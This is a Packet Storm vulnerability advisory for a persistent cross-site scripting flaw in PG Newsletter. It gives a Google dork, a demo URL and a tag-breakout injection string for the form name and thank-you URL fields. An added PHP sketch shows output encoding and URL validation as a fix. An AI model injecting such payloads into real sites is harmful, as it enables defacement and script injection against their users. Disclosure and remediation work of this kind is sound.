PG Newsletter Cross Site Scripting

2011-07-13T00:00:00
ID PACKETSTORM:103002
Type packetstorm
Reporter r007k17-w
Modified 2011-07-13T00:00:00

Description

                                        
`
  
# Exploit Title: PG Newsletter persistent XSS vulnerability  
# Vendor: demo.newsletter.pro  
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D  
# My Blog: http://www.shadowrootkit.wordpress.com  
# Google Dork: © 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered by PG Newsletter Software <http://www.newsletter.pro/> - email marketing software  
  
****************************************************************************************************************************************************************************************  
Persistent XSS Vulnerability  
********************************  
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit  
EXPLOIT: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>  
  
Observe: Log in to the admin panel (demo). Inject this script in the create form page, i.e. {DEMO}, in the formname field or the thankyoupageURL field.  
Now observe: demo.newsletter.pro/forms/index.php  
  
*****************************************************************************************************************************************************************************************  
sp3c14l Thanks to s1d3 effects and my friends@!3.14--  
*****************************************************************************************************************************************************************************************  
`
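
Mitigation sketch for the two fields named above, as an added example that is not part of the original advisory and not PG Newsletter's own code: stored values are HTML-encoded when the form list is rendered, and the thank-you page URL is restricted to absolute http(s) URLs. The helper names (`h`, `validate_thankyou_url`, `render_form_row`) and the table markup are assumptions; only the field names and the test string come from the advisory.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: PG Newsletter's real code is not shown in the advisory.

/** Encode a stored value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only absolute http(s) URLs for the thank-you page; null means reject. */
function validate_thankyou_url(string $url): ?string
{
    $url = trim($url);
    if ($url === '' || preg_match('/[\x00-\x20"\'<>`\\\\]/', $url)) {
        return null; // control chars, whitespace, quotes, angle brackets, backslash
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

/** Render one row of the form list (the page the advisory says to observe). */
function render_form_row(string $formName, string $thankYouUrl): string
{
    $safeUrl = validate_thankyou_url($thankYouUrl);
    $link = $safeUrl === null
        ? '<em>invalid URL</em>'
        : '<a href="' . h($safeUrl) . '" rel="noopener">' . h($safeUrl) . '</a>';
    return '<tr><td>' . h($formName) . '</td><td>' . $link . '</td></tr>';
}

// Constructed sample input: the string from the advisory's EXPLOIT line.
$payload = '">><marquee><h1>XSSed_by_r007k17</h1></marquee>';

// The form name is shown as literal text and the URL is rejected.
echo render_form_row($payload, $payload), PHP_EOL;
// A legitimate form renders normally.
echo render_form_row('Summer signup', 'https://example.com/thanks'), PHP_EOL;
```

Encoding at output time also covers values already stored in the database before a fix is deployed; validating the URL when the form is saved additionally keeps `javascript:` and similar schemes out of the thank-you redirect.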